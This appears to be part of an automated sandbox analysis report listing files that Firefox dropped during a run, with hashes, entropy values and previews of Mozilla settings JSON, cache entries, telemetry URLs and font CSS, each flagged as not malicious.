                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16711
                                                                                                                                                                                  Entropy (8bit):6.281717038585735
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Z/+L7VqN4mApqN3Xo70tNo+pwPm082nyFz/a65:Z/+QApQHkKo+pwPo2I
                                                                                                                                                                                  MD5:037762193264712DCC531D44D6B50B4F
                                                                                                                                                                                  SHA1:9E47461BF1AF824535BCC85B17563D64D208C3A3
                                                                                                                                                                                  SHA-256:74B9DA2FC160638FB979D39BE9B36A2EEB749DA76C0529D692F5ADEA856066BA
                                                                                                                                                                                  SHA-512:A196F67C9E880AEA4FCF8975AF54177FF3A343066AC692B24389E4F0128EB5BE8DE15B8713AEC6AB027C61CBC7D32701991B00BA7516216A713543CCAE291424
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):145408
                                                                                                                                                                                  Entropy (8bit):5.30129426807303
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:dA2izZWUdYJlFQu6zVh7VzOh0Rc04zNU0vCKF8k:RKwgIou6zVhK0Rc04zBrF8k
                                                                                                                                                                                  MD5:6B88B6C580FB07FF3BBCEE2E2C18F04E
                                                                                                                                                                                  SHA1:1AF85DFAFA7FBC02A597E08D89D1DB2AF6D23CC4
                                                                                                                                                                                  SHA-256:CE3A24EB132F6810F181D2AA4A7929EDF94967EB5B00678F02F00AEF846FC866
                                                                                                                                                                                  SHA-512:0360DECE4592DE259A8564ED707BE890DF8EE39E1B31E62DC38CFD901C936A3C194A8C4F014ECAA3C19E2820206C21BB02AB7B1B5524B65854B20546810BF558
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"1526xz659wc2524fjnl5jmwrc8","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"0Rv3kTuT-IsyMl7_pOa_AfK1NVZapSxAIn0XNhUQyFqmRg7PNFKsPkkLtOX5c-_8xtHAkpEOsGXW4sw2oapELSF8Ri-cu8Glu-NRzaFX-OfaAAdxT6YutgA0KeLQVBbe","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEwsfTf5S2a2sekbOGwvfp1fzj+EX015Cbp8qoECAsPf3bIiOUBcpsPNrqE7CwENuT9M56G330NauFdbZuhlUOBbOWisNkg7ytb5xloJUDSUNPtm+vMLaNp+RQO9COPvWl"},"id":"nimbus-desktop-experiments","last_modified":1708446279357},"timestamp":1708446279105,"changes":[{"slug":"speculative-connect-sockets-with-lcp-beta","appId":"firefox-desktop","appName":"firefox_desktop","channel":"beta","endDate":null,"locales":null,"branches":[{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"valu
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):23602
                                                                                                                                                                                  Entropy (8bit):7.760782342711032
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/+n2MtV0rAD0PTaId3:cqrVO++tw/9CICFbQLlx+2MtVpD0La83
                                                                                                                                                                                  MD5:ADC34CA55BA442687BB3079FBCF68EDB
                                                                                                                                                                                  SHA1:9D99C45BDE4748594A382548A4345CB776164C85
                                                                                                                                                                                  SHA-256:3561287C1C6619A7D20BAF1167F9A1FE903BDC1CFBF0E8E1BD9190E22FCCADE2
                                                                                                                                                                                  SHA-512:59AE4DD3FD356F1E88BF3ED1DAB7ADFD6216396BCB1115D0B0885E26DBEE536E01A63B473979B28FBC3FA713D98C596723E8E94CEB9C26B461C9D24F45E947D4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):836652
                                                                                                                                                                                  Entropy (8bit):7.998802621175594
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:24576:RU5+yypiAf3Q5sQ2rveB3Rd0fXj9i+BZqYqrWn:g+yycAY5mrva3RdCjgY3
                                                                                                                                                                                  MD5:B00F1A36BF726B662A505EC300181282
                                                                                                                                                                                  SHA1:B65B2C382916A55116EBC30238E5011D74E983A1
                                                                                                                                                                                  SHA-256:5EB9EDC53AEA6D20BE3B27D45BA72688F46F85AB852332797DAED7F93642A610
                                                                                                                                                                                  SHA-512:07AEDB13E2265C284C6F08A6E4D92CCCB21298798CBB6102AE8DA8BF25422A3E267C0F13F5BC8CDAB4495029D1B309AAD3B2F37FD9CA3321C03DE109D2213E3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16563
                                                                                                                                                                                  Entropy (8bit):6.240542672430208
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:m9CfLTL+7VqN4mApqN3Xo70tNo+pwPm082nyFz/aAa:m9aHHApQHkKo+pwPo2z
                                                                                                                                                                                  MD5:26CC7EB72C7F43BE8C7E34886201DB97
                                                                                                                                                                                  SHA1:FAE9AEDC86D1315A30A1E8E575DFE421FC4310CF
                                                                                                                                                                                  SHA-256:7A41353CF251936CF246BE93BA89E01C060B13E485A4BB57F47740C586220BD4
                                                                                                                                                                                  SHA-512:C9EBBCBD869510BB2FE622FCCFDE1A6C705A70C1316EEBC456753E31117090A2A0C9A6127ADAA31680F633FCC39FD92E2D0E0A09CFFA10AA1179D72DE06D825B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..@. ......L1p![l..w.Q....M....u.0....[....,.......wq;i.a.~_[.`...`!..3z..U...;.8..pWY.r.so=...=.j.&...+.@\#.....?...,.`,.*.....q.......'.U]..U...?(...........}IO.ImA=.I..@.>-.....;...5en........9.../.5I...9.g8t..,`..=G`.L.D7..........3._9....@2&]m.._...R.c\o.3 .{.N..GC..*......E.GQ.....k.%...>.9..k.....Q..C./.. .P+..uK....E..p.....a.).&.....gD .....".D.Y....;_`...{.3@.M...K.T.,T....D.Q..O.Q..O>..?..b1.n..pfy...)..S;Ca@.M...6j.D....B2..P.60>.;....,].W\..Q........A.......L.3~.*..a.{.Y......7eH.E...~I>...Ps.\..Q.2...)...mn..\&.8..b...:{.3.e^....Si......3...`..,.]......X.5...O{...%_`...@.@....(.:U..@e.)`.T1U........\....l].o.@_+..QGhN.(F..c.Er.M..P.L2...p..|.....(2V..D...?...GJ...&..s..z(.o.....D...v#)S.......H..ZSJ......O....CU.......1.a..`QM........e..!e..!F.+.g..|........O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/87423d78/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js.necko:classified
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 303628288
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17265
                                                                                                                                                                                  Entropy (8bit):7.315148695841036
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:dMWYUCyptNgbIxn/7o8ZqFqmzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDxlCvDx6:3YujX8zSWvoI8zSWvoIBHJmvOz
                                                                                                                                                                                  MD5:26111C06C8E22F7DECA0014FEC1C9FD7
                                                                                                                                                                                  SHA1:A89DA232449715B820E93377F72B6C374262E000
                                                                                                                                                                                  SHA-256:8C04DACAFBBEFDFFC0B5C7354FBE4FF46B79D56CDDA5FC4DD4E430BAE1FB6007
                                                                                                                                                                                  SHA-512:D59227C0B4DDCD5B98C5568D0FF6D31290F989F2D0DBF3349A489A7986E4B7E4E46FC4B2B5CCBE787EAECAC91102A93A5FFD22C7F2EEF4E96C7B75CD441AC838
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):23814
                                                                                                                                                                                  Entropy (8bit):7.768086745081726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzZQ2MtV0rAD0PTaw:jslQ+LhUoTB0Qr6Qjkg/DmcJufzZvMto
                                                                                                                                                                                  MD5:01DB4CBADA3A72A79FD416A2C54952D0
                                                                                                                                                                                  SHA1:D2F736B4EB057EE73338528F32333083D06A338A
                                                                                                                                                                                  SHA-256:9D04E224B9887B58DA3194699AA3B37483F68426B4CADCE0F34E0660970EB982
                                                                                                                                                                                  SHA-512:EE198A9E44289312C8092A42508C39D2E8AA2AA6A5C74BAB8829D50142D4688171B8D48A5760AFE9EEDC1DA0ECC38C341A7554285AD1FE32E4218E0A57037BD4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10690
                                                                                                                                                                                  Entropy (8bit):6.08569119937783
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Wapn0t7Yaxh6+/6zeXtph56TGrO3afbaI8j3qMpULYYQ6jBr/CULYYQ6jBr//:Zpn02amNydTaqTaIdlLYYQ6/LYYQ6B
                                                                                                                                                                                  MD5:7A9D3A124A1BE02AE4F43DAB07ADE249
                                                                                                                                                                                  SHA1:09599AC61D541DA80FF4E9FD6A7137A0DEA11D5D
                                                                                                                                                                                  SHA-256:D1A062BFF6F4320E1BBD2288866D592BEE320F5E43B98D59FE2E5CDD8B9B0341
                                                                                                                                                                                  SHA-512:48C0507934665ECF81BFB1BCAB9E53C682C0B1D4730C709CD58FA87B8C18737F7DF36EFF4D414354FC978785F3F9A0FDAFD2F00D8F07C5591ED1D6FC5DA15BC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"page_size":25,"page_count":1,"count":0,"next":null,"previous":null,"results":[]} ... :https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-search-detection%40mozilla.com%2Cgoogle%40search.mozilla.org%2Camazondotcom%40search.mozilla.org%2Cwikipedia%40search.mozilla.org%2Cbing%40search.mozilla.org%2Cddg%40search.mozilla.org%2Cfirefox-compact-light%40mozilla.org%2Cfirefox-compact-dark%40mozilla.org%2Cfirefox-alpenglow%40mozilla.org&lang=en-US
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):38693
                                                                                                                                                                                  Entropy (8bit):7.668681827680487
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:vbRrJVMvBJMdBEuXKhQfJApQHkKo+pwPo2o:vZ/M5JcrKB0SQn
                                                                                                                                                                                  MD5:56C92BECE0341718D1AB7663B8F30594
                                                                                                                                                                                  SHA1:022982D391DDFFFBAC923F6E0A02F7814416CF62
                                                                                                                                                                                  SHA-256:4E6E7E691BAFD22D5AD3B4925B7D8A04F83187C8D787707B0EB203E2ED68BFB0
                                                                                                                                                                                  SHA-512:F5CE26C2304F5BAFD22411F24114DFB282DF9F1C3788A23F08C119012E24C0C6E4D0D360561EC04D913ED638ADF2F87AE2EE36125521844497AD6961BA32314B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10220)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):89296
                                                                                                                                                                                  Entropy (8bit):5.588970570694905
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:drOMDK8NFbtMD636tHdHaOMjKwSo3XItkuSbFdXynW3s6J8xym:drOqFGMj1s6J8xym
                                                                                                                                                                                  MD5:E3AD4C5AB1BA9E43BADC57225F1368C6
                                                                                                                                                                                  SHA1:E66E011C391FB54603B11EF18F445146A5E3E058
                                                                                                                                                                                  SHA-256:9131F426D5FDC097374D6F649740F75E62EE954A435483226AF0FA8D45700482
                                                                                                                                                                                  SHA-512:718CC42E93A4354E7FF25E8565B6E6C3C38BB7E2E5A57CB43A89A922611DABE60C86AF7DF405C64996F531DFB9B4ACB602A04563CFFA3E31D46A79622C41BD5A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8045
                                                                                                                                                                                  Entropy (8bit):6.040222095317026
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:iiMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckTLUcuTLc:GWebV2GZuZrFK0k0t7qW0NbZovEpoc
                                                                                                                                                                                  MD5:DFF0D28FDCB15634E11EC1A4271BC133
                                                                                                                                                                                  SHA1:1E5B4726B4082C59E1ED2F4C429948BEA64E61D9
                                                                                                                                                                                  SHA-256:01B379C9E6B7EE1E1D93AE994A6115E928BFFE8482E75630756402663C830EB1
                                                                                                                                                                                  SHA-512:470C3E64E23A270E0DD8AA3D4F40559AB82D10A47675B127B2A4D113FC474069C8CC7F253F0EF824403687206684D8DB596DC0965EE12B6F4065BD153E27730D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..b/........e...e...F.A.e......{....a,~1708514990,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/0662ae79-7d3e-4596-a16d-d1cef2261f61.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2360)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):224984
                                                                                                                                                                                  Entropy (8bit):5.53877410439541
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:E0nzyu8ItYoHFldaY4xzuQVLlGDPcHGcp1+8Z:lnCuYgTaY4/GqGQs8Z
                                                                                                                                                                                  MD5:3A3A1B2920FE18AC9E027FF25407025A
                                                                                                                                                                                  SHA1:878BF92EF3A65047215A99B81B55302A40FA9035
                                                                                                                                                                                  SHA-256:F335C39D33AC1DF6C3142A23A17AB91C154F6A85D683D3ABE4681085B181DE79
                                                                                                                                                                                  SHA-512:9F3729E0DFDD9CEBEF14FEF904DE8EFB84E58502183B4A7178D7741A59B490281B0A02E0B6D19A3D2F3BF75060AFED6A63A67D9335002581727F7725DF853172
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.039194877425497
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:0MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEck/LUcu/LU3:jWebV2GZuZrFK0k0t7qW0NbZovEpkA
                                                                                                                                                                                  MD5:8CDB47766FF6B9734CBACEACE9641A26
                                                                                                                                                                                  SHA1:39C11E740EB20E338DD4A542A12A3D9B6C99D006
                                                                                                                                                                                  SHA-256:8B13BAF74DF0918A7022A1A5400812F75FD61C92CED620607125AB681D534FED
                                                                                                                                                                                  SHA-512:33D3154E5813FA35E589D637FB933F3F20D7B524C44BB60FE698BD06F0327C327576E144EA01002F4A0230643CB550A003CDEC9F3F1F3168892B6CFCAE3CF8B6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..mO........e...e...F.A.e...........a,~1708515001,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1116)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):82933
                                                                                                                                                                                  Entropy (8bit):5.669831521788845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:4GIr9iykWXc8VV4ucbxiyXdpGupDMbSrOLR0QZWtPWDG4nFjI9rkiDyVO9HI4Ckz:h45nb3nxQIiENg5Bi+C02byFxv8m
                                                                                                                                                                                  MD5:2E11DEDABD6899B63B28254926E9B636
                                                                                                                                                                                  SHA1:80A2E1EBE03456BD0B86D935FBE045D06FBCAC43
                                                                                                                                                                                  SHA-256:1A914F6B06DC7F867636329CD7DA8FAAFE6BC9F346D247D53B83DEED8BBB1F68
                                                                                                                                                                                  SHA-512:384BD2F532FB98BDF324E02FE391FDDFCB793A22121545899E194833EE5A86B350DAF60395923145D7EB6BF3A9ADA021658B96F10F5987DABB07DB5FC3A84663
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. f
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.04220673130266
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:fceMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZov0ckaLUcuaI:f2WebV2GZuZrFK0k0t7qW0NbZov0pvR
                                                                                                                                                                                  MD5:5C1BC75F9F56E6855FC58A9EFCFC6720
                                                                                                                                                                                  SHA1:E06CEF628F6541EC1751C5C39CDD1D20BBA7E8B4
                                                                                                                                                                                  SHA-256:FB9EAEB5B0F8DA2BA567AAFBCED1C28C4CEB33BECBB747354DC013F25941C9FC
                                                                                                                                                                                  SHA-512:08A538B37FC67D4E240C4182FC57AD716ABA1DF4DDCB9BE086C2C031C375C5D1F4745002809E64FCF492BCD7B86FE2E78E95CF7D301E2BA0B1C77C312938EACB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........e...e...F.A.e......z....a,~1708514979,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/a7791896-2046-4b05-9685-73f32d9a99cc.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18388
                                                                                                                                                                                  Entropy (8bit):5.822959992107189
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:yPwmZ/4L6dbuMBA62ukuPpi0eLYGBRohB1r1uk/KiFTaIda4u:xk+M/phe8GvIDuuKOa8M
                                                                                                                                                                                  MD5:BC6D050E75279B2EBC6A5F51EFE4BBE8
                                                                                                                                                                                  SHA1:D3C5E3D5DE0D968360E4A3FF2896D76C1B244C73
                                                                                                                                                                                  SHA-256:4031428EEB69E6CCF1B98A5D6B8B3DDAE63CC9595D63D23F39A1F353F90BEAAC
                                                                                                                                                                                  SHA-512:286781D140FE9A932158BF8D26FC1CA6BB8FD5B3841094583987FA25D9BA9403F47B03E77D9FEB7DCE4497368DF2E7D33952E2ABF77F42A4B29C79DF00F68A63
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"3sxgg1ah4an421obr0dsmnp0rs","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"-xGeEstPfIJ28hr6tg7ff17SPt4bb-48x3o23AG7TlzTVo6AWQPiYzSs_WzjdYDD46_AHzXIqShEr_giQw4kjFblJ4R1ZoUgLOJ-kdOIelaHfsm1br2ICbaSTAsD1uou","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"displayFields":["addon_id"],"id":"pioneer-study-addons-v1","last_modified":1708041616659},"timestamp":1607042143590,"changes":[{"name":"Political and COVID-19 News Information Flows Study","icons":{"32":"https://ion-extension.prod.dataops.mozgcp.net/Princeton-Shield-32px.png","64":"https://ion-extension.prod.dataops.mozgcp.net/Princeton-Shield-32px.png","128":"https://ion-extension.prod.dataops.mozgcp.net/
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 4261543936
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11695
                                                                                                                                                                                  Entropy (8bit):6.4136728006012085
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ve4Sj8TUmWPYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvDXhj46:m4SjMULWmzwTWvoglJmzwTWvogrBHJmX
                                                                                                                                                                                  MD5:E64084DDFAA9929E7E103C42B60C368C
                                                                                                                                                                                  SHA1:E8837D47C1F14EC695A2DB505A0F1CCE83C9010E
                                                                                                                                                                                  SHA-256:33F8893989F0AB05FDB11A2AC7906F2AA299DB3E0D715262FADC0FD4E1CBE734
                                                                                                                                                                                  SHA-512:D81600268DC168E7D30D9A989850A56B3CCE6514A9D4E9D96B7206C79304FB090B6CA798247F1A210E630A561821D9DF887B046A197B483F6CA0FE986DD45851
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8635
                                                                                                                                                                                  Entropy (8bit):6.104637165326964
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:KUBfcfeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdIdSdIdN:/cfeLYGBRohB1r1uk/KiFTaIda/e
                                                                                                                                                                                  MD5:10A8A1351A4541E4A0ECBE3878BF768C
                                                                                                                                                                                  SHA1:67E89DE81B2B6CCD71C6A27A523F8A21439EAA2E
                                                                                                                                                                                  SHA-256:D251D5471DCCB2B11470406B883D2C54724B07267AA19D29FEF422E07FF274B2
                                                                                                                                                                                  SHA-512:9D1AA9D9D1E88B4E2EA56344D0EB26CD5F5B6EA7391799D1AECD7AD137ED8CCFA2CCFC23635935370C3759886084001C22683C8DD23C8D960FDB4FC25172D5D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"11rufr35kqbk31bmg5n729kkoa","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"xgTVutOXxmWwBSW0E3gL_qtYiCHV5iFp8onHFZC1gP3AAOrXGjaPbzaXpDbP_82MN40b9cXndgp4Jynj4GoxRZ6Syfy7qEnSrzWBLZtb957yRoZ_J0p8eAnnrDror6uV","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"websites-with-shared-credential-backends","last_modified":1708041610977}}.?............e...e...F.B.e..X........:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/websites-with-shared-credential-backends?_expected=1659924446436.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sg
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1573144
                                                                                                                                                                                  Entropy (8bit):7.999354159537703
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:24576:o1O22TCwmuQGB2D4aM7kJvJcWyJxQOvog/VrvkYwnnta7gl4qnSfM6i:K2TY1+2c7CvJ9KoKkY7K4qSfTi
                                                                                                                                                                                  MD5:1246A33A2875D50EC0D61A81DE781231
                                                                                                                                                                                  SHA1:B46CAF51E38596C98ABEF52E9EAD086ABCCD7217
                                                                                                                                                                                  SHA-256:2108E40F2315CA91D9ACCDF719D7F64CA840EB4AF351BC9FB69F81344E8E70C9
                                                                                                                                                                                  SHA-512:65069DFFD0F470151569680BF77CE84BE71FB698B65143651D5FBC043C921A51F80CD2776B72484041F2D69C3F87FA12801A6D48C5E4C12550AFBDCD681E160F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 605618176
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17287
                                                                                                                                                                                  Entropy (8bit):7.310741678272729
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:NUY2i+E6JNHv2KhXZqlqmzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDxfCvDxh:Ii+E6DvXJszSWvoI8zSWvoIBHJmvOz
                                                                                                                                                                                  MD5:C7C22C3AEDE69762CFA77876F3CF5479
                                                                                                                                                                                  SHA1:9CAC96040929629AFA7FC4131D61405AEFDD2C61
                                                                                                                                                                                  SHA-256:4E8F1FA973EE47378BC425FF0638D3654B53A0447613B4207F35F4767C558A4B
                                                                                                                                                                                  SHA-512:B3206129BE295D9943B01ED0D6FD71E04C73000D7AE56021A21B48A233CDC20511879C00778AE5627370470FABDDE3BF3AF3766DFA7616B6ADC6594078DEF8C3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 1463156736
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24309
                                                                                                                                                                                  Entropy (8bit):7.661672149995045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:o/zIqnLirh+zGXXsyZhP0JTJiAC0eEg1pclKu5bebAOnHmzwTWvoglJmzwTWvogd:o/z6hsC8yjaTJivtclH55bzSWvoI8zSU
                                                                                                                                                                                  MD5:68A0ED0DB06410AFE3A333C2FEEB4DAE
                                                                                                                                                                                  SHA1:D7B95202367E438E115D8A308D12C4FF9492F56A
                                                                                                                                                                                  SHA-256:3592EDFE83CA90DA1FCE2F1D0A6EF7ED7C48A2EC58596C30BF73E016E40D2C7C
                                                                                                                                                                                  SHA-512:F7C8F05E7AC94F36056B13E06D1D277A85D2699FBD755381AC8EA19BED33BC2B69E22BF7B9ED99E8072E7F3CB0989BDD09344405B71CADA7451EE832507BF4F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):82082
                                                                                                                                                                                  Entropy (8bit):5.711406609198048
                                                                                                                                                                                  Encrypted:false
